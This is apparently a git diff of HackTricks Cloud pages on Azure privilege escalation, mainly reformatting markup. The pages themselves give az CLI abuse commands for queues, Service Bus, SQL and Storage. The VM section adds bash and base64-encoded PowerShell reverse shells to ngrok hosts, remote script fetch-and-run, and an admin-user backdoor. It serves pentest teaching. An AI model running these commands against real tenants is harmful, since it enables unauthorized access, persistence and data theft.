 ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action`
 
 With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages.
 
-{% code overflow="wrap" %}
 ```bash
 az storage message put --queue-name  --content "Injected malicious message" --account-name 
 ```
-{% endcode %}
 
 ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write`
 
 This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue.
 
-{% code overflow="wrap" %}
 ```bash
 az storage message put --queue-name  --content "Injected malicious message" --account-name 
 
@@ -71,13 +51,11 @@ az storage message update --queue-name  \
     --visibility-timeout  \
     --account-name 
 ```
-{% endcode %}
 
 ### Action: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
 
 This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
 
-{% code overflow="wrap" %}
 ```bash
 az storage queue create --name  --account-name 
 
@@ -85,25 +63,11 @@ az storage queue metadata update --name  --metadata key1=value1 key2
 
 az storage queue policy set --name  --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name 
 ```
-{% endcode %}
 
 ## References
 
-* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
-* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
-* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
similarity index 72%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
index ce5248f01..1aff5fbc9 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
@@ -1,34 +1,19 @@
 # Az - Service Bus Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Service Bus
 
 For more information check:
 
-{% content-ref url="../az-services/az-servicebus-enum.md" %}
-[az-servicebus-enum.md](../az-services/az-servicebus-enum.md)
-{% endcontent-ref %}
-
+{{#ref}}
+../az-services/az-servicebus-enum.md
+{{#endref}}
 
 ### Send Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action`
 
 You can retrieve the `PrimaryConnectionString`, which acts as a credential for the Service Bus namespace. With this connection string, you can fully authenticate as the Service Bus namespace, enabling you to send messages to any queue or topic and potentially interact with the system in ways that could disrupt operations, impersonate valid users, or inject malicious data into the messaging workflow.
 
-{% code overflow="wrap" %}
 ```python
 #You need to install the following libraries
 #pip install azure-servicebus
@@ -97,12 +82,11 @@ print("Messages Sent")
 print("----------------------------")
 
 ```
-{% endcode %}
 
 ### Recieve Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action`
+
 You can retrieve the PrimaryConnectionString, which serves as a credential for the Service Bus namespace. Using this connection string, you can receive messages from any queue or subscription within the namespace, allowing access to potentially sensitive or critical data, enabling data exfiltration, or interfering with message processing and application workflows.
 
-{% code overflow="wrap" %}
 ```python
 #You need to install the following libraries
 #pip install azure-servicebus
@@ -125,15 +109,15 @@ async def receive_and_process_messages():
 
         # Get the Subscription Receiver object for the specified topic and subscription
         receiver = servicebus_client.get_subscription_receiver(
-            topic_name=TOPIC_NAME, 
-            subscription_name=SUBSCRIPTION_NAME, 
+            topic_name=TOPIC_NAME,
+            subscription_name=SUBSCRIPTION_NAME,
             max_wait_time=5
         )
 
         async with receiver:
             # Receive messages with a defined maximum wait time and count
             received_msgs = await receiver.receive_messages(
-                max_wait_time=5, 
+                max_wait_time=5,
                 max_message_count=20
             )
             for msg in received_msgs:
@@ -148,6 +132,7 @@ print("----------------------------")
 ```
 
 ### `Microsoft.ServiceBus/namespaces/authorizationRules/write` & `Microsoft.ServiceBus/namespaces/authorizationRules/write`
+
 If you have these permissions, you can escalate privileges by reading or creating shared access keys. These keys allow full control over the Service Bus namespace, including managing queues, topics, and sending/receiving messages, potentially bypassing role-based access controls (RBAC).
 
 ```bash
@@ -160,18 +145,10 @@ az servicebus namespace authorization-rule update \
 
 ## References
 
-* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
-* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
-* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
-* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
-* https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
+- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
+- https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
 
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
similarity index 59%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
index bf2b2515d..8122224dc 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
@@ -1,32 +1,19 @@
 # Az - SQL Database Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## SQL Database Privesc
+
 For more information about SQL Database check:
 
-{% content-ref url="../az-services/az-sql.md" %}
-[az-sql.md](../az-services/az.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/az-sql.md
+{{#endref}}
 
 ### "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/write"
 
 With these permissions, a user can perform privilege escalation by updating or creating Azure SQL servers and modifying critical configurations, including administrative credentials. This permission allows the user to update server properties, including the SQL server admin password, enabling unauthorized access or control over the server. They can also create new servers, potentially introducing shadow infrastructure for malicious purposes. This becomes particularly critical in environments where "Microsoft Entra Authentication Only" is disabled, as they can exploit SQL-based authentication to gain unrestricted access.
 
-{% code overflow="wrap" %}
 ```bash
 # Change the server password
 az sql server update \
@@ -42,24 +29,20 @@ az sql server create \
   --admin-user  \
   --admin-password 
 ```
-{% endcode %}
 
 Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
 
-{% code overflow="wrap" %}
 ```bash
 az sql server update \
   --name  \
   --resource-group  \
   --enable-public-network true
 ```
-{% endcode %}
 
 ### "Microsoft.Sql/servers/firewallRules/write"
 
 An attacker can manipulate firewall rules on Azure SQL servers to allow unauthorized access. This can be exploited to open up the server to specific IP addresses or entire IP ranges, including public IPs, enabling access for malicious actors. This post-exploitation activity can be used to bypass existing network security controls, establish persistence, or facilitate lateral movement within the environment by exposing sensitive resources.
 
-{% code overflow="wrap" %}
 ```bash
 # Create Firewall Rule
 az sql server firewall-rule create \
@@ -77,16 +60,14 @@ az sql server firewall-rule update \
     --start-ip-address  \
     --end-ip-address 
 ```
-{% endcode %}
 
-Additionally, ```Microsoft.Sql/servers/outboundFirewallRules/delete``` permission lets you delete a Firewall Rule. 
-NOTE: It is necesary to have the public access enabled 
+Additionally, `Microsoft.Sql/servers/outboundFirewallRules/delete` permission lets you delete a Firewall Rule.
+NOTE: It is necesary to have the public access enabled
 
 ### ""Microsoft.Sql/servers/ipv6FirewallRules/write"
 
 With this permission, you can create, modify, or delete IPv6 firewall rules on an Azure SQL Server. This could enable an attacker or authorized user to bypass existing network security configurations and gain unauthorized access to the server. By adding a rule that allows traffic from any IPv6 address, the attacker could open the server to external access."
 
-{% code overflow="wrap" %}
 ```bash
 az sql server firewall-rule create \
   --server  \
@@ -95,16 +76,14 @@ az sql server firewall-rule create \
   --start-ip-address  \
   --end-ip-address 
 ```
-{% endcode %}
 
-Additionally, ```Microsoft.Sql/servers/ipv6FirewallRules/delete``` permission lets you delete a Firewall Rule.
-NOTE: It is necesary to have the public access enabled 
+Additionally, `Microsoft.Sql/servers/ipv6FirewallRules/delete` permission lets you delete a Firewall Rule.
+NOTE: It is necesary to have the public access enabled
 
 ### "Microsoft.Sql/servers/administrators/write" && "Microsoft.Sql/servers/administrators/read"
 
 With this permissions you can privesc in an Azure SQL Server environment accessing to SQL databases and retrieven critical information. Using the the command below, an attacker or authorized user can set themselves or another account as the Azure AD administrator. If "Microsoft Entra Authentication Only" is enabled you are albe to access the server and its instances. Here's the command to set the Azure AD administrator for an SQL server:
 
-{% code overflow="wrap" %}
 ```bash
 az sql server ad-admin create \
   --server  \
@@ -112,13 +91,11 @@ az sql server ad-admin create \
   --display-name  \
   --object-id 
 ```
-{% endcode %}
 
 ### "Microsoft.Sql/servers/azureADOnlyAuthentications/write" && "Microsoft.Sql/servers/azureADOnlyAuthentications/read"
 
 With these permissions, you can configure and enforce "Microsoft Entra Authentication Only" on an Azure SQL Server, which could facilitate privilege escalation in certain scenarios. An attacker or an authorized user with these permissions can enable or disable Azure AD-only authentication.
 
-{% code overflow="wrap" %}
 ```bash
 #Enable
 az sql server azure-ad-only-auth enable \
@@ -130,19 +107,5 @@ az sql server azure-ad-only-auth disable \
   --server  \
   --resource-group 
 ```
-{% endcode %}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
similarity index 60%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
index 3f3fba06b..d94de30c0 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
@@ -1,27 +1,14 @@
 # Az - Storage Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Storage Privesc
 
 For more information about storage check:
 
-{% content-ref url="../az-services/az-storage.md" %}
-[az-storage.md](../az-services/az-storage.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/az-storage.md
+{{#endref}}
 
 ### Microsoft.Storage/storageAccounts/listkeys/action
 
@@ -45,7 +32,6 @@ az storage account keys renew --account-name  --key key2
 
 A principal with this permission will be able to create or update an existing storage account updating any setting like network rules or policies.
 
-{% code overflow="wrap" %}
 ```bash
 # e.g. set default action to allow so network restrictions are avoided
 az storage account update --name  --default-action Allow
@@ -53,7 +39,6 @@ az storage account update --name  --default-action Allow
 # e.g. allow an IP address
 az storage account update --name  --add networkRuleSet.ipRules value=
 ```
-{% endcode %}
 
 ## Blobs Specific privesc
 
@@ -61,9 +46,8 @@ az storage account update --name  --add networkRuleSet.ipRules value=<
 
 The first permission allows to **modify immutability policies** in containers and the second to delete them.
 
-{% hint style="info" %}
-Note that if an immutability policy is in lock state, you cannot do neither of both
-{% endhint %}
+> [!NOTE]
+> Note that if an immutability policy is in lock state, you cannot do neither of both
 
 ```bash
 az storage container immutability-policy delete \
@@ -94,9 +78,8 @@ This should allow a user having this permission to be able to perform actions in
 
 ### Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read)
 
-With this permission, an attacker can create and update (if has ```Microsoft.Storage/storageAccounts/localusers/read``` permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the user’s permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data.
+With this permission, an attacker can create and update (if has `Microsoft.Storage/storageAccounts/localusers/read` permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the user’s permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data.
 
-{% code overflow="wrap" %}
 ```bash
 az storage account local-user create \
   --account-name  \
@@ -106,35 +89,29 @@ az storage account local-user create \
   --home-directory  \
   --has-ssh-key false/true # Depends on the auth method to use
 ```
-{% endcode %} 
 
 ### Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action
 
 With this permission, an attacker can regenerate the password for a local user in an Azure Storage account. This grants the attacker the ability to obtain new authentication credentials (such as an SSH or SFTP password) for the user. By leveraging these credentials, the attacker could gain unauthorized access to the storage account, perform file transfers, or manipulate data within the storage containers. This could result in data leakage, corruption, or malicious modification of the storage account content.
 
-{% code overflow="wrap" %}
 ```bash
 az storage account local-user regenerate-password \
   --account-name  \
   --resource-group  \
   --name 
 ```
-{% endcode %}
 
 To access Azure Blob Storage via SFTP using a local user via SFTP you can (you can also use ssh key to connect):
 
-{% code overflow="wrap" %}
 ```bash
 sftp @.blob.core.windows.net
 #regenerated-password
 ```
-{% endcode %}
 
 ### Microsoft.Storage/storageAccounts/restoreBlobRanges/action, Microsoft.Storage/storageAccounts/blobServices/containers/read, Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
 
 With this permissions an attacker can restore a deleted container by specifying its deleted version ID or undelete specific blobs within a container, if they were previously soft-deleted. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
 
-{% code overflow="wrap" %}
 ```bash
 #Restore the soft deleted container
 az storage container restore \
@@ -148,45 +125,28 @@ az storage blob undelete \
   --container-name  \
   --name "fileName.txt"
 ```
-{% endcode %}
 
 ### Microsoft.Storage/storageAccounts/fileServices/shares/restore/action && Microsoft.Storage/storageAccounts/read
 
 With these permissions, an attacker can restore a deleted Azure file share by specifying its deleted version ID. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
 
-{% code overflow="wrap" %}
 ```bash
 az storage share-rm restore \
   --storage-account  \
   --name  \
   --deleted-version 
 ```
-{% endcode %}
 
 ## Other interesting looking permissions (TODO)
 
-* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob
-* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob
-* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command
-* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action
 
 ## References
 
-* [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage)
-* [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
+- [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage)
+- [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
 
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
similarity index 85%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
index b558868c5..ee62ce582 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
@@ -1,38 +1,25 @@
 # Az - Virtual Machines & Network Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## VMS & Network
 
 For more info about Azure Virtual Machines and Network check:
 
-{% content-ref url="../az-services/vms/" %}
-[vms](../az-services/vms/)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/vms/
+{{#endref}}
 
 ### **`Microsoft.Compute/virtualMachines/extensions/write`**
 
 This permission allows to execute extensions in virtual machines which allow to **execute arbitrary code on them**.\
 Example abusing custom extensions to execute arbitrary commands in a VM:
 
-{% tabs %}
-{% tab title="Linux" %}
-* Execute a revers shell
+{{#tabs }}
+{{#tab name="Linux" }}
+
+- Execute a revers shell
 
-{% code overflow="wrap" %}
 ```bash
 # Prepare the rev shell
 echo -n 'bash -i  >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
@@ -48,11 +35,9 @@ az vm extension set \
   --settings '{}' \
   --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
 ```
-{% endcode %}
 
-* Execute a script located on the internet
+- Execute a script located on the internet
 
-{% code overflow="wrap" %}
 ```bash
 az vm extension set \
   --resource-group rsc-group> \
@@ -63,13 +48,13 @@ az vm extension set \
   --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
   --protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Windows" %}
-* Execute a reverse shell
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
+- Execute a reverse shell
 
-{% code overflow="wrap" %}
 ```bash
 # Get encoded reverse shell
 echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
@@ -85,11 +70,9 @@ az vm extension set \
   --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
 
 ```
-{% endcode %}
 
-* Execute reverse shell from file
+- Execute reverse shell from file
 
-{% code overflow="wrap" %}
 ```bash
 az vm extension set \
   --resource-group  \
@@ -100,21 +83,19 @@ az vm extension set \
   --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
   --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
 ```
-{% endcode %}
 
 You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
 
-* Reset password using the VMAccess extension
+- Reset password using the VMAccess extension
 
-{% code overflow="wrap" %}
 ```powershell
 # Run VMAccess extension to reset the password
 $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
 Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred
 ```
